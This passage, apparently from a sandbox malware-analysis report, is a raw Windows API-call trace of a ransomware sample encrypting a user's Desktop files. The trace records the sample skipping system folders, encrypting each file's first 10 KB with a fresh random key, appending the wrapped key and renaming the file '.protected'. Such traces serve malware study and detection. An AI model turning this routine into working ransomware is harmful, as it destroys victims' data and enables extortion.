HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt") returned 104 [0091.181] StrStrW (lpFirst="G7ClT0AmJ8fD fQ.odt", lpSrch=".zip") returned 0x0 [0091.181] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.181] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.181] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0091.182] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.182] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0091.182] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, 
lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0091.182] CloseHandle (hObject=0x14c) returned 1 [0091.182] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt.protected") returned 114 [0091.182] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\g7clt0amj8fd fq.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\G7ClT0AmJ8fD fQ.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\g7clt0amj8fd fq.odt.protected")) returned 1 [0091.182] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0091.182] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="Windows") returned -1 [0091.182] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="Program Files") returned -1 [0091.182] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="Program Files (x86)") returned -1 [0091.183] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="$Recycle.bin") returned 1 [0091.183] lstrcmpiW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="System Volume Information") returned -1 [0091.183] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S") returned 102 [0091.183] lstrcmpW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2=".") returned 1 [0091.183] lstrcmpW (lpString1="Kfu0Y9c3Zz0gzms4S", lpString2="..") returned 1 [0091.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\*") returned 104 [0091.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0091.183] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.183] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.183] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.183] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.183] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\.") returned 104 [0091.183] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.183] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.183] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.183] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.183] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.183] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.183] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\..") returned 105 [0091.183] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.183] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.183] FindNextFileW (in: hFindFile=0x47ba90, 
lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="Windows") returned -1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="Program Files") returned -1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="Program Files (x86)") returned -1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="$Recycle.bin") returned 1 [0091.183] lstrcmpiW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="System Volume Information") returned -1 [0091.183] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3") returned 125 [0091.183] StrStrIW (lpFirst="34q8LYel2GI7toSolS.mp3", lpSrch=".protected") returned 0x0 [0091.183] lstrcmpW (lpString1="34q8LYel2GI7toSolS.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.183] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.183] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\34q8lyel2gi7tosols.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3") returned 125 [0091.184] StrStrW 
(lpFirst="34q8LYel2GI7toSolS.mp3", lpSrch=".txt") returned 0x0 [0091.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3") returned 125 [0091.184] StrStrW (lpFirst="34q8LYel2GI7toSolS.mp3", lpSrch=".rar") returned 0x0 [0091.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3") returned 125 [0091.184] StrStrW (lpFirst="34q8LYel2GI7toSolS.mp3", lpSrch=".zip") returned 0x0 [0091.184] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.185] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.185] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.185] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.185] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.185] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.185] CloseHandle (hObject=0x150) returned 1 [0091.185] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3.protected") returned 135 [0091.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\34q8lyel2gi7tosols.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\34q8LYel2GI7toSolS.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\34q8lyel2gi7tosols.mp3.protected")) returned 1 [0091.186] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="Windows") returned -1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="Program Files") returned -1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="Program Files (x86)") returned -1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="$Recycle.bin") returned 1 [0091.186] lstrcmpiW (lpString1="3YkhdC6iOv.mp3", lpString2="System Volume Information") returned -1 [0091.186] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3") returned 117 [0091.186] StrStrIW (lpFirst="3YkhdC6iOv.mp3", lpSrch=".protected") returned 0x0 [0091.186] lstrcmpW (lpString1="3YkhdC6iOv.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.186] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.186] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, 
dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\3ykhdc6iov.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3") returned 117 [0091.187] StrStrW (lpFirst="3YkhdC6iOv.mp3", lpSrch=".txt") returned 0x0 [0091.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3") returned 117 [0091.187] StrStrW (lpFirst="3YkhdC6iOv.mp3", lpSrch=".rar") returned 0x0 [0091.187] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3") returned 117 [0091.187] StrStrW (lpFirst="3YkhdC6iOv.mp3", lpSrch=".zip") returned 0x0 [0091.187] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.187] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.187] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.187] 
SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.187] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.188] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.188] CloseHandle (hObject=0x150) returned 1 [0091.188] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3.protected") returned 127 [0091.188] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\3ykhdc6iov.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\3YkhdC6iOv.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\3ykhdc6iov.mp3.protected")) returned 1 [0091.188] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="Windows") returned -1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="Program Files") returned -1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="Program Files (x86)") returned -1 [0091.188] lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="$Recycle.bin") returned 1 [0091.188] 
lstrcmpiW (lpString1="Ak6j40UD.pps", lpString2="System Volume Information") returned -1 [0091.188] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps") returned 115 [0091.188] StrStrIW (lpFirst="Ak6j40UD.pps", lpSrch=".protected") returned 0x0 [0091.188] lstrcmpW (lpString1="Ak6j40UD.pps", lpString2="RESTORE_FILES.txt") returned -1 [0091.188] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.188] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ak6j40ud.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0091.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps") returned 115 [0091.189] StrStrW (lpFirst="Ak6j40UD.pps", lpSrch=".txt") returned 0x0 [0091.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps") returned 115 [0091.189] StrStrW (lpFirst="Ak6j40UD.pps", lpSrch=".rar") returned 0x0 [0091.189] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps") returned 115 [0091.189] StrStrW (lpFirst="Ak6j40UD.pps", lpSrch=".zip") returned 
0x0 [0091.189] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.190] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.190] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0091.190] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.190] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0091.190] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0091.190] CloseHandle (hObject=0x150) returned 1 [0091.190] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps.protected") returned 125 [0091.190] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ak6j40ud.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\Ak6j40UD.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\ak6j40ud.pps.protected")) returned 1 [0091.191] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="Windows") returned -1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="Program Files") returned -1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="Program Files (x86)") returned -1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="$Recycle.bin") returned 1 [0091.191] lstrcmpiW (lpString1="K8Inyx3A_O61.bmp", lpString2="System Volume Information") returned -1 [0091.191] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp") returned 119 [0091.191] StrStrIW (lpFirst="K8Inyx3A_O61.bmp", lpSrch=".protected") returned 0x0 [0091.191] lstrcmpW (lpString1="K8Inyx3A_O61.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0091.191] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0091.191] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0091.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\nJwznA2soJ6bFlT8CNWJ\\DsoHgMd_94Dqe\\Kfu0Y9c3Zz0gzms4S\\K8Inyx3A_O61.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\njwzna2soj6bflt8cnwj\\dsohgmd_94dqe\\kfu0y9c3zz0gzms4s\\k8inyx3a_o61.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
